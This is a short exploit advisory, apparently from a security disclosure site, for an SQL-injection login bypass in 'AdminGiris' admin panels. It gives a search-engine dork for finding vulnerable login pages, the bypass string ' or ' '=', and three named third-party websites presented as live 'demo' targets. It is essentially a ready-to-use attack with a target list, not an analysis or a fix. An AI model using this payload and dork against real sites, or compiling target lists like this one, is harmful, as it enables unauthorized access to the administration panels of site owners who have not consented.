AdminGiris Sql Bypass

Published
Credit
Risk
2016.07.25
Av3LoXiS
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: inurl:/admin/admingiris.php

# Exploit Title : AdminGiris Sql Bypass
# Exploit Author : Av3LoXiS
# Dork : inurl:/admin/admingiris.php
# Date: 2016/07/25
____________________________________________________
# Sql Bypass Code : 'or' '='

#Admin Panel

http://www.example.com/Admin/AdminGiris.php

#Demo Admin Panel

http://www.bucayapidekorasyon.com/admin/admingiris.php
http://mysmuhendislik.com/admin/admingiris.php
http://snsinsaat.com.tr/admin/admingiris.php

==========================================
# Discovered by : Av3LoXiS
# FB : /Av3LoXiS


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com